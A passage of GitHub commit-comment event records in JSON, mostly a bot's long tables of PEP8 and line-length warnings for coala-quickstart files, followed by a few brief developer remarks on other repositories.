|\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 231 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 232 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 233 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 234 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 235 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 236 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | coala_quickstart/green_mode/green_mode.py | 237 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 238 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 239 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 241 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 243 |\n| Line contains following spacing inconsistencies: - Tabs used instead of spaces. | coala_quickstart/green_mode/green_mode.py | 244 |\n| Line contains following spacing inconsistencies: - Trailing whitespaces. | coala_quickstart/green_mode/green_mode.py | 246 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-02T22:43:22Z"}
{"id":"7909302611","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala-quickstart"},"payload":{"comment":{"id":29573054,"position":null,"line":null,"path":null,"commit_id":"6c6ddc794c49f62aa4394fed5422ae447362e4fd","created_at":"2018-07-02T22:43:28Z","updated_at":"2018-07-02T22:43:28Z","author_association":"NONE","body":"Comment on 6c6ddc794c49f62aa4394fed5422ae447362e4fd.\n\nThere are 293 results for the section all.autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | coala_quickstart/green_mode/filename_operations.py | 3 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/filename_operations.py | 14 |\n| E302 expected 2 blank lines, found 1 | coala_quickstart/green_mode/filename_operations.py | 4 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 5 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 6 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 7 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 8 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 9 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 10 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 11 |\n| E302 expected 2 blank lines, found 1 | coala_quickstart/green_mode/filename_operations.py | 13 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 14 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 15 |\n| E501 line too long (82 > 80 characters) | coala_quickstart/green_mode/filename_operations.py | 15 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 16 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 17 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 18 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 19 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 20 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 21 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 22 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 23 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 24 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 25 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 26 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 27 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 28 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 29 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 30 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 31 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 32 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 33 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 34 |\n| E101 indentation contains mixed spaces and tabs | coala_quickstart/green_mode/filename_operations.py | 34 |\n| E114 indentation is not a multiple of four (comment) | coala_quickstart/green_mode/filename_operations.py | 34 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 35 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 36 |\n| E101 indentation contains mixed spaces and tabs | coala_quickstart/green_mode/filename_operations.py | 36 |\n| E114 indentation is not a multiple of four (comment) | coala_quickstart/green_mode/filename_operations.py | 36 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 37 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 38 |\n| E101 indentation contains mixed spaces and tabs | coala_quickstart/green_mode/filename_operations.py | 38 |\n| E114 indentation is not a multiple of four (comment) | coala_quickstart/green_mode/filename_operations.py | 38 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 39 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 40 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 41 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 42 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 43 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 44 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/filename_operations.py | 45 |\n| The code does not comply to PEP8. | coala_quickstart/coala_quickstart.py | 102 |\n| E303 too many blank lines (2) | coala_quickstart/coala_quickstart.py | 103 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/QuickstartBear.py | 7 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 7 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 8 |\n| E225 missing whitespace around operator | coala_quickstart/green_mode/QuickstartBear.py | 8 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 9 |\n| E714 test for object identity should be 'is not' | coala_quickstart/green_mode/QuickstartBear.py | 9 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 10 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 11 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 12 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 13 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 15 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 16 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 17 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 18 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 19 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 20 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/QuickstartBear.py | 21 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 16 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 24 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 32 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 37 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 60 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 71 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 88 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 104 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 130 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 145 |\n| The code does not comply to PEP8. | coala_quickstart/green_mode/green_mode.py | 218 |\n| E101 indentation contains mixed spaces and tabs | coala_quickstart/green_mode/green_mode.py | 16 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 16 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 17 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 18 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 19 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 20 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 24 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 25 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 26 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 27 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 28 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 32 |\n| E211 whitespace before '(' | coala_quickstart/green_mode/green_mode.py | 32 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 33 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 37 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 38 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 39 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 40 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 41 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 43 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 44 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 45 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 46 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 47 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 48 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 49 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 50 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 51 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 52 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 53 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 54 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 55 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 56 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 60 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 61 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 62 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 63 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 64 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 65 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 66 |\n| E501 line too long (102 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 66 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 67 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 71 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 72 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 73 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 74 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 75 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 76 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 77 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 78 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 79 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 80 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 81 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 82 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 83 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 84 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 88 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 89 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 90 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 91 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 92 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 93 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 94 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 95 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 96 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 97 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 98 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 99 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 100 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 104 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 105 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 106 |\n| E501 line too long (97 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 106 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 107 |\n| E501 line too long (116 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 107 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 108 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 109 |\n| E101 indentation contains mixed spaces and tabs | coala_quickstart/green_mode/green_mode.py | 109 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 110 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 111 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 112 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 113 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 114 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 115 |\n| E501 line too long (85 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 115 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 116 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 117 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 119 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 120 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 121 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 122 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 124 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 125 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 127 |\n| E302 expected 2 blank lines, found 1 | coala_quickstart/green_mode/green_mode.py | 129 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 130 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 131 |\n| E101 indentation contains mixed spaces and tabs | coala_quickstart/green_mode/green_mode.py | 131 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 132 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 133 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 134 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 135 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 136 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 137 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 138 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 139 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 140 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 141 |\n| E501 line too long (100 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 144 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 145 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 146 |\n| E222 multiple spaces after operator | coala_quickstart/green_mode/green_mode.py | 146 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 147 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 148 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 149 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 150 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 151 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 152 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 153 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 154 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 155 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 156 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 157 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 158 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 159 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 160 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 161 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 162 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 163 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 164 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 165 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 166 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 167 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 168 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 169 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 170 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 171 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 172 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 173 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 174 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 175 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 176 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 177 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 178 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 179 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 180 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 181 |\n| W293 blank line contains whitespace | coala_quickstart/green_mode/green_mode.py | 181 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 182 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 183 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 184 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 185 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 186 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 187 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 188 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 189 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 190 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 191 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 192 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 193 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 194 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 195 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 196 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 197 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 198 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 199 |\n| E722 do not use bare except' | coala_quickstart/green_mode/green_mode.py | 199 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 200 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 201 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 202 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 203 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 204 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 205 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 206 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 209 |\n| E303 too many blank lines (2) | coala_quickstart/green_mode/green_mode.py | 209 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 211 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 212 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 213 |\n| E303 too many blank lines (3) | coala_quickstart/green_mode/green_mode.py | 217 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 218 |\n| E501 line too long (90 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 218 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 219 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 220 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 221 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 222 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 223 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 224 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 225 |\n| W293 blank line contains whitespace | coala_quickstart/green_mode/green_mode.py | 225 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 226 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 227 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 228 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 229 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 230 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 231 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 232 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 233 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 234 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 235 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 236 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 237 |\n| W293 blank line contains whitespace | coala_quickstart/green_mode/green_mode.py | 237 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 238 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 239 |\n| E501 line too long (117 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 239 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 241 |\n| E501 line too long (109 > 80 characters) | coala_quickstart/green_mode/green_mode.py | 241 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 243 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 244 |\n| W191 indentation contains tabs | coala_quickstart/green_mode/green_mode.py | 246 |\n| W293 blank line contains whitespace | coala_quickstart/green_mode/green_mode.py | 246 |\n| W391 blank line at end of file | coala_quickstart/green_mode/green_mode.py | 248 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-02T22:43:28Z"}
{"id":"7909302636","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala-quickstart"},"payload":{"comment":{"id":29573055,"position":null,"line":null,"path":null,"commit_id":"6c6ddc794c49f62aa4394fed5422ae447362e4fd","created_at":"2018-07-02T22:43:29Z","updated_at":"2018-07-02T22:43:29Z","author_association":"NONE","body":"Comment on 6c6ddc794c49f62aa4394fed5422ae447362e4fd.\n\nThere are 14 results for the section all.linelength. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Line is longer than allowed. (85 > 80) | coala_quickstart/green_mode/filename_operations.py | 15 |\n| Line is longer than allowed. (111 > 80) | coala_quickstart/green_mode/green_mode.py | 66 |\n| Line is longer than allowed. (100 > 80) | coala_quickstart/green_mode/green_mode.py | 106 |\n| Line is longer than allowed. (119 > 80) | coala_quickstart/green_mode/green_mode.py | 107 |\n| Line is longer than allowed. (91 > 80) | coala_quickstart/green_mode/green_mode.py | 115 |\n| Line is longer than allowed. (86 > 80) | coala_quickstart/green_mode/green_mode.py | 122 |\n| Line is longer than allowed. (86 > 80) | coala_quickstart/green_mode/green_mode.py | 125 |\n| Line is longer than allowed. (82 > 80) | coala_quickstart/green_mode/green_mode.py | 132 |\n| Line is longer than allowed. (89 > 80) | coala_quickstart/green_mode/green_mode.py | 141 |\n| Line is longer than allowed. (100 > 80) | coala_quickstart/green_mode/green_mode.py | 144 |\n| Line is longer than allowed. (87 > 80) | coala_quickstart/green_mode/green_mode.py | 160 |\n| Line is longer than allowed. (93 > 80) | coala_quickstart/green_mode/green_mode.py | 218 |\n| Line is longer than allowed. (120 > 80) | coala_quickstart/green_mode/green_mode.py | 239 |\n| Line is longer than allowed. (112 > 80) | coala_quickstart/green_mode/green_mode.py | 241 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-02T22:43:29Z"}
{"id":"7909302891","type":"CommitCommentEvent","actor":{"login":"saskcow"},"repo":{"name":"kylem123/demos"},"payload":{"comment":{"id":29573056,"position":null,"line":null,"path":null,"commit_id":"90c6b2037301fd6d0148411cffb4cb80d5022512","created_at":"2018-07-02T22:43:34Z","updated_at":"2018-07-02T22:43:34Z","author_association":"NONE","body":"Not keeping the example tkinter from the docs?"}},"created_at":"2018-07-02T22:43:34Z"}
{"id":"7909303810","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29573063,"position":138,"line":138,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/NibbleWriter.cs","commit_id":"35a49e8470528b9658ecc34150fcd70a379be3df","created_at":"2018-07-02T22:43:53Z","updated_at":"2018-07-02T22:43:53Z","author_association":"OWNER","body":"Obsolete comment, will fix."}},"created_at":"2018-07-02T22:43:53Z"}
{"id":"7909305901","type":"CommitCommentEvent","actor":{"login":"StefanCristian"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":29573069,"position":null,"line":null,"path":null,"commit_id":"917f53cf13c36d32c175f80f2074576595830573","created_at":"2018-07-02T22:44:33Z","updated_at":"2018-07-02T22:44:33Z","author_association":"NONE","body":"@karelzak Proosal: migrate libmount source to C and remove the python code?\r\nOr separate the python-related util into a different repository and call it pylibmount."}},"created_at":"2018-07-02T22:44:33Z"}
{"id":"7909306616","type":"CommitCommentEvent","actor":{"login":"hclivess"},"repo":{"name":"lomtax/digitalcoin"},"payload":{"comment":{"id":29573071,"position":null,"line":null,"path":null,"commit_id":"5296633bcb59053c60ac08bfc2f5f80ea1fd4346","created_at":"2018-07-02T22:44:47Z","updated_at":"2018-07-02T22:44:47Z","author_association":"NONE","body":"should be \"yet\", already implies positive "}},"created_at":"2018-07-02T22:44:47Z"}
{"id":"7909309224","type":"CommitCommentEvent","actor":{"login":"jtclaypool"},"repo":{"name":"jtclaypool/microbiome"},"payload":{"comment":{"id":29573084,"position":null,"line":null,"path":null,"commit_id":"7b2cf36a61db25a313a1fbf77554a5c82ec61f59","created_at":"2018-07-02T22:45:40Z","updated_at":"2018-07-02T22:45:40Z","author_association":"OWNER","body":"I'm not sure I follow, but from what I can tell, everything still works. If your installation isn't working, can you give me some more background information?"}},"created_at":"2018-07-02T22:45:40Z"}
